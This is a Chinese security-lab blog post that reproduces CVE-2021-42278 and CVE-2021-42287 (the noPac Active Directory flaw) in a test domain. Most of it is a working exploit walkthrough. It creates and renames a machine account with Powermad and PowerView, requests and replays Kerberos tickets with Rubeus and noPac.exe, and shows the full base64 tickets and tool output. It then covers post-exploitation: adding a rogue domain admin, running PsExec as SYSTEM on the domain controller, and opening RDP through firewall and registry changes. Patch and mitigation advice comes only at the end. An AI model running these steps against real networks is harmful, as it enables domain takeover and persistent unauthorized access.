CVE-2021-42287/CVE-2021-42278 域内提权

2021-12-21 16:09:28 浏览数 (1)

星期五实验室

阅读须知

星期五实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失,均由使用者本人负责。

星期五实验室拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。

01

背景及影响范围

背景

2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。

影响范围

CVE-2021-42287:

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

CVE-2021-42278:

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2019 (Server Core installation)

Windows Server 2022

Windows Server 2019

Windows Server 2012 R2 (Server Core installation)

02

漏洞介绍

  • CVE-2021-42278,机器账户的名字一般来说应该以$结尾,但AD没有对域内机器账户名做验证。
  • CVE-2021-42287,配合 CVE-2021-42278 使用,创建与域控机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self 申请TGS Ticket,接着域控在 TGS_REP 阶段,这个账户不存在的时候,DC会使用自己的密钥加密 TGS Ticket ,提供一个属于该账户的 PAC,然后我们就得到了一个高权限ST。

03

测试环境信息

域控win2016:

  • 域名:vulntarget.com
  • 账号:administrator
  • 密码:admin@123
  • 计算机名:WIN-UH20PRD3EAO //系统自带的,没改过

域成员win10:

  • 账号:vulntarget.comwin101
  • 密码:admin#123

04

复现测试

本次用两种方式进行复现,分别是一步步请求获取票据和使用工具直接两步到位。

一步步请求获取票据

利用 powermad.ps1 新增机器帐号

下载地址:

https://github.com/Kevin-Robertson/Powermad

代码语言:javascript复制
Import-Module .Powermad.ps1

New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose

拿下域成员之后,很好定位到域控,得到域主机名,msf直接运行:run post/windows/gather/enum_domain

需要修改下策略

以管理员打开powershell(使用本地管理员就行,cmd管理员打开,uac验证的时候,使用本地管理员的账密,将域那个位置改为本地的机器名),运行参考:https://www.jianshu.com/p/a0a88d3bb787

代码语言:javascript复制
Set-ExecutionPolicy RemoteSigned

执行之后,选择Y就好。

添加用户eval,设置一个密码:admin123

代码语言:javascript复制
New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose

清除SPN信息

代码语言:javascript复制
Set-DomainObject "CN=eval,CN=Computers,DC=vulntarget,DC=com" -Clear 'serviceprincipalname' -Verbose

使用Set-DomainObject需要加载模块:powerview模块,下载地址:

https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1,直接右键保存,后缀为ps1就行。

重设机器名称

代码语言:javascript复制
Set-MachineAccountAttribute -MachineAccount eval -Value "WIN-UH20PRD3EAO" -Attribute samaccountname -Verbose

//重设的机器名称上面定位域控的时候就查询到了,为WIN-UH20PRD3EAO,eval为刚才新建的用户

请求TGT

代码语言:javascript复制
.Rubeus.exe asktgt /user:WIN-UH20PRD3EAO /password:admin123 /domain:vulntarget.com /dc:WIN-UH20PRD3EAO.vulntarget.com /nowrap

//password为刚才新建机器账号时的密码

修改机器的samaccountname值

将值修改回到原来的属性

代码语言:javascript复制
Set-MachineAccountAttribute -MachineAccount eval -Value "eval" -Attribute samaccountname -Verbose

获取票据

利用刚刚申请的TGT进行S4U2self,模拟域内的域管去请求域控DC的ST票据,最终获得域控制器DC的权限。

代码语言:javascript复制
.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw52dWxudGFyZ2V0LmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQCiSaN7Tiezy9leFd3mpA1 1uTIIdouVoccMl3Qp 90weQdXBMJldg4t9a8F5Up/skzAg08Px74Jubld1YyT qK0yv3/7YnFvZryleWV3VWJhn4DXwiwf2IUb28V8EDouuY7Z9s6nlm9GPVI03fHbZUuMMNzP6Nc5Pxk 6jm2NjgjdgX0ww5w41WvF1bluI2OOb8OVmYByP5a32dLDin9rLyglgw NA8B1fhyuaHAZtHhXXKTY5EQfJ2eJc0mgAm8xk0XsGOeAKh/4LlRER5R5Rg19UKdh7lkx15M2IodyWHoEIvNdAtw2LteopcnckMduER R6zY7Uloef1gg3B4iTMJmt9 BEIcXLITUVLqCjLFN/5Iugkf0LZoWNMfhlEZzlTcnORUHE4mBzsM8K01b0pFairByE66wwFaZhe4yh3Kvb8qcsYXeuY0D4gxqm 9pmfXXrKw5z1vzF1Ff2MCg4p2cuTU0tiyxUow7yY6T5Ae0f6siBoPi SSnBKSPTu9wOvziCD5Cq2fxiMMMPoLY0x0mZSVf6tci11gUTLw2k0y4Yvtsd86zWnS2xpNPl8zDk42RWg eKdiUARXIUu7WYWogbavl9/NGt YcfttCWHX7vPRlZVhpppMYSAqJWQDHb8vAsPkMzID/tqmJO/FTt1kraKVQY2KACacDkrN/o5asNxLq5tKHkouH6qnHx3xY6hABONBV2c7l0HQ9BxNTkzVdGOVf6tQKfFoMZKdSSpWr4Pn9baR5NllqYr FMDalfkhBOWkKhxOkcunbD8ABfJn6Rc2GQwpVDg3u5z7ndnt8vQhP5sYcXSz8XpjdU53Ddq89Kf1gwlKwR3zjusQfBM7u0EzPoz8Rxq1SqDar9HWooBfOOk5GJ5n93vjT76vlfQ9aLGnyTfBfJAOMcPFzXEt9xUrORPGdm93IR38f4m0WmU2jpIZJhbxmz8hDvEcQf 26PUaP7iZEZ5c492PfXKfl6zvkjPx0/iTdiTWl uFuyrhB/f1WuQOyNzcs41ePprqLypenIjlmeo1ugJQM6B1F1NrnvO43bpmhjq tSkAbGYumhDchDQQB4ezju2LPh iK8COub04hguE06vCT2uiIi0ZGA mmrAdAxRxTal4Aup4QZc8E5dmDwVD3KbzAkkbhtfXI7ZtUcb/T6EZRV56if1nlDp11c5x3OjwJwpKbvUL5Q1joJ1gMzQf/Mg2SkEMs4ShPxOpwrRdkhzhj whhzi8O6QtG4gWiyT4nwlbirkZ7mY6eCiorRCXF4cPV1uBwWAHdKl4ckWIsI4C tppNIByRH0nXbszoOnY4s5Xo5 Mmlj6sx9ff8I9sLULiT/G0ih6cupNbQLF3ms7jr6w o4HjMIHgoAMCAQCigdgEgdV9gdIwgc ggcwwgckwgcagGzAZoAMCARehEgQQ1nRhtTe/YZYYjku02ZLU0qEQGw5WVUxOVEFSR0VULkNPTaIcMBqgAwIBAaETMBEbD1dJTi1VSDIwUFJEM0VBT6MHAwUAQOEAAKURGA8yMDIxMTIxMzEzMTUzOFqmERgPMjAyMTEyMTMyMzE1MzhapxEYDzIwMjExMjIwMTMxNTM4WqgQGw5WVUxOVEFSR0VULkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOdnVsbnRhcmdldC5jb20=

查询票据

但是发现访问不到域控,查看了下,对比nopac的payload,nopac使用的cifs服务,而这里使用的是ldap服务,将这里的ldap服务改为cifs服务即可:/altservice:LDAP,修改为:/altservice:cifs

代码语言:javascript复制
原本:>.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]

该服务即可:.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]

修改后

代码语言:javascript复制
.Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw52dWxudGFyZ2V0LmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQC6ha0sLmV5NFrig66k/5WB8xTFCVCHPMF1CVS7aalY5GCCUGLkPNb4W7g lsijGS6T7hCNufoU/tMzrzmRpsihme5aK2mnZuqoEuMlAEzVpbFZR00CzZ7tG6zwobx7aE5XFecfwXjJBgh5ZE3lgNDB7QFRA/uJUuCfdmQsFytbXlJiNPee/ycuXG/Y6J908R33GQ6WB7sboht4zmgiHwWh38ZwXGLP9tGwg0psK0Jr9f2yU6s5wTiKvky5ABQLJClj RNC/HlGTl F7HLZek1uNw52DaIM4ghgF3FOHokiM66cPKVArKlVSmvUEtCncno1xLFhgcxZlOd6F N7T1anVmO4gAxghftRaqrAzCgpg42w7jyWiJbht9740XG01fuMttkvrq1EiJtmGvSAHVx3oSf0jqlkjwLexZbtTu 8nY  WI195ZmiD4B4PsxubBIQWu6sa43T0v16NRg40P6nEe3Arh1hDZc6XPuCG19FOnTyPTJgCu8T4Df1Tr6oO8j07rYLuk2ozBeH/u3upyOOd0GRuSY3U8pqBNsZVrHfdPRCGvEVzK8zuEfKKN19EIdZVZL3WGAMFFQHxU700peSbmke68GpmuCzq5 3S0rE2lC1jSnXDIONQicgjX4Xbq65P9abNXymEsCu7i7NrU2O1jUaJemqUMod8cDuvd3ZeX FooeeX/N KZeuZaw24jTN46w7C4F2EWUX4eO1pkMocw31Hj6 OGXZfzLmf92PphIrEMz0 l8TdHkZ6cTZkx0FXo4bhcNh/4vLFQ9 LRprqT/Sk2auOqcDYAJIWQD4Fy5dhd8QlmUybwseWohk8y7GhGWalkKN7feVrs9OuZZO1V7xbK30AY2UR87R7hiDz7MQ/hQ0CWZLl15vuxSKbrG0gvMOxrGO4Za6Dfz1VoPS kjV/oUueZVXwRCVgYf0t9PrLmlZ66PHwX2q20hvv42pg694Rgl6g8XdS0SiEf yntjZ51Z8KXMlIA8Rk0o2aT6/b6nF4/jF7Mq/s4 VKwitPOksvvMF9zhscDbcqC31xwuEHb0H3DJaiKsMbxOea 8FztGvC48yjphC5VzLPvGrJqtlPmrCNKPZhV2TQqRi1uC0gJZ92nBbVnLGKHO058fd2XqZ3zHyr9YJTXzY7Q4k31LxbBF5H999noEyyTs3fkyJ5Uvihb71s1PJ3ZO14EWa55mYrH94gxL1HCl4YvCqCo2VXNAjU49XvylpeqCmReRLV3JMTOuemh/yQT0bKlC8Ou5cSMIXe WX7y6IoHyKZGWTYGqe/6Ctfsw2LTGSw2iZuAD2EmuoibbQ3bIcEyJCalr/k0Yr0vbrPYW/vltzOd0UE76MtTLplBcd1Cy27rgo4HjMIHgoAMCAQCigdgEgdV9gdIwgc ggcwwgckwgcagGzAZoAMCARehEgQQ24AjfZb2ZKzSNXPxMye416EQGw5WVUxOVEFSR0VULkNPTaIcMBqgAwIBAaETMBEbD1dJTi1VSDIwUFJEM0VBT6MHAwUAQOEAAKURGA8yMDIxMTIxMzE0MjExNFqmERgPMjAyMTEyMTQwMDIxMTRapxEYDzIwMjExMjIwMTQyMTE0WqgQGw5WVUxOVEFSR0VULkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOdnVsbnRhcmdldC5jb20=

自动化

利用脚本地址:

https://github.com/cube0x0/noPac,需要自己编译为exe文件。

运行noPac.exe需要.net环境,下载地址:https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718

执行命令,查看是否存在漏洞,顺便可以拿到域控的机器账号,看到这里的票据大小为537,有师傅提醒说如果票据大于1000,就是添加了PAC,没有这个漏洞了。

代码语言:javascript复制
.noPac.exe scan -domain vulntarget.com -user win101 -pass admin#123     //账号密码为域成员win10的

可以看到是存在漏洞,能拿到票据。执行一下命令传递票据。

代码语言:javascript复制
.noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt


//这里会增加一个密码为admin@123的机器账号test
代码语言:javascript复制
C:Userswin101DesktopPowermad-master>.noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt
[ ] Distinguished Name = CN=test,CN=Computers,DC=vulntarget,DC=com
[ ] Machine account test added
[ ] Machine account test attribute serviceprincipalname cleared
[ ] Machine account test attribute samaccountname updated
[ ] Got TGT for WIN-UH20PRD3EAO.vulntarget.com
[ ] Machine account test attribute samaccountname updated
[*] Action: S4U

[*] Using domain controller: WIN-UH20PRD3EAO.vulntarget.com (10.0.10.100)
[*] Building S4U2self request for: 'WIN-UH20PRD3EAO@VULNTARGET.COM'
[*] Sending S4U2self request
[ ] S4U2self success!
[*] Substituting alternative service name 'cifs/WIN-UH20PRD3EAO.vulntarget.com'
[*] Got a TGS for 'administrator' to 'cifs@VULNTARGET.COM'
[*] base64(ticket.kirbi):

      doIFzDCCBcigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NojEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29to4IEXjCCBFqgAwIBEqEDAgEDooIETASCBEirOVpwF2mskeBncTRkD5gQcgRUTZyU/OsEvtM7iT9ZOsJqBpkHZGvLILAvVCTiPcQ2SFaJxwWrvYzpNBNwrdriWoIOcSmbLc5DPSCvoLTkUIUZJWAX8czSuoleU/3dZ5gJpHUYKjPa/MEW/KWlr2hHE7IjgskiOrPy89MpIVQAI/iH1BvnoaVxEP6LNmQvrQXO9DOFvQigt3qh87Pc n6bJ7HBBW6PTQiXTLlwDPLbJfuRU8UqTiUIpuS/hhT9nNTtzOF8Mb1SuXpYG97igldulsWHWlSs6gpFFe5wKtpGHluKUHWBOoQe4lZo/EgCmEGZfO/YNfIfiE7 fyLHMNfkecaDboKFi/6UKKihV5eTCwYAiaoDWuwBxMCOC1VbptozpyiSvFmwjtkYakK6DQKWdOSb4Ia2AXp3OEfTvcfq9cWQavNAOFMNR6txisCUko4 PCofEu9sL26w6vdqPnYLfie1aMLs/DWjavuWe6/8j2EcwX6vgvJYVXgSXQibnhVDbn7mf 4Tfaa4ht096fKX54j5ja9CjaElRuCogqW3TUeDSYUpjvMcpDPax0cLR/99/uZnx s9BLda jQX4lh3OmxtmUW8CjZS6Sv3XQW/CyhzD4B2RFPXk3Ya7j56F3Wikeq6yW9AHF2EuD 9fNpMhg2nydv9vtt19mAj2BfljXKWJz4EXnbT sYEapcwchvufHQu6a2n/ iq2G9tjSkH6Z2Vnn8Ui gJeTm2im pVBntKR0CpnEAKlCtD3G5/RlqkZchY2zBPebMiyqx0mtBWqMMaTS3p0D//FLvX1oo3g80zShCelw4y J3Z8MGZdUFw21Mckz9eIk5jt0VcX4h5snC/OlrMN7 yJAUl1tqC/O8tp4q2J9Jbqz W5idJjNj1EGvnJ6kZ6owo/87qigObGchJKLZkS4wAuSe3kSh0PyirIBowjKJMVKtTg5ruW6y6cS SGRLk5PRS7b9apSUKdH26XvXCLepH4s9Aje fmLCPwzwVGp2 ErWeBOy6Pyi7malGE601/eg0M5XuaTc7EahgQuHY8KIZ8RBFJRrkMiULiBNctewgdm1bzRol0/GqtZT 5aH27klcGfLx3D8yUCylkl2o7sJVUwcNo6fYwtfElvm5JM9EiujfzDgkUTjSCSBrR9f/BihHNqYFVUfvhQDBAsL/6Lmo7nlMQN  Gq/oPukS5o6m/nykNwhbF178gtSE45jGKiGgBzvSFIkqI6I4JGxKJmpzk6UgoVL1BxguCkbgO/dlRhqvbjdSw5PrOph5KsiWkxwYuCvhCVs4EU23zvm0jrzhAsJwmQVVry9vhZLBRzagWSWEPD1g9vzIJoV/aO4GXgtcN/bbCfnodZ39SKosTinJ7E tQpHipy l54flXZHI9hapjpG5l7IvBScOARggTVaAV9L8fbvWyQJTjN8OgmF1L1DVQQnu03HBmCjqTIdo4H/MIH8oAMCAQCigfQEgfF9ge4wgeuggegwgeUwgeKgKzApoAMCARKhIgQg6IvCqN83Pz8hva8aEtoE655mm mQdTAURKY5uKitJMGhEBsOVlVMTlRBUkdFVC5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAApQAApREYDzIwMjExMjE0MDEyNjA2WqYRGA8yMDIxMTIxNDExMjYwNlqnERgPMjAyMTEyMjEwMTI2MDZaqBAbDlZVTE5UQVJHRVQuQ09NqTEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29t

[ ] Ticket successfully imported!

在域控上会多一个机器账号test

添加域管账号

代码语言:javascript复制
net user admin QWEasd@123 /add /domain
net group "Domain Admins" admin /add /domain

查看域管账号是否添加成功

代码语言:javascript复制
net group "domain admins" /domain

有了域控账密,可以使用PsExec64.exe来对域控进行下一步的操作,开3389之类的。

代码语言:javascript复制
PsExec64.exe -u  vulntargetadmin -i -p QWEasd@123 -s cmd.exe     //本地使用域控的cmd,-s使用system权限来运行,不然会被拒绝,执行不了一些命令

这里域控还没有开启3389。

尝试开启域控3389,修改防火墙策略。

代码语言:javascript复制
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

开启远程:

代码语言:javascript复制
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

使用新建的域控账密登录试试:

账号:admin

密码:QWEasd@123

远程成功。

其他利用方式,自行操作。

05

修复建议

  1. 微软官方已推出补丁:KB5008602、KB5008380,或者更新windows系统
  2. 通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0,中断此漏洞的利用链。

参考链接:

代码语言:javascript复制
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

FRIDAY LAB

星期五实验室成立于2017年,汇集众多技术研究人员,在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成,且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队,星期五实验室凭借精湛的专业技术水平,为产品研发提供新思路、为行业技术革新探索新方向。

windowsserver windows linux https 网络安全

0 人点赞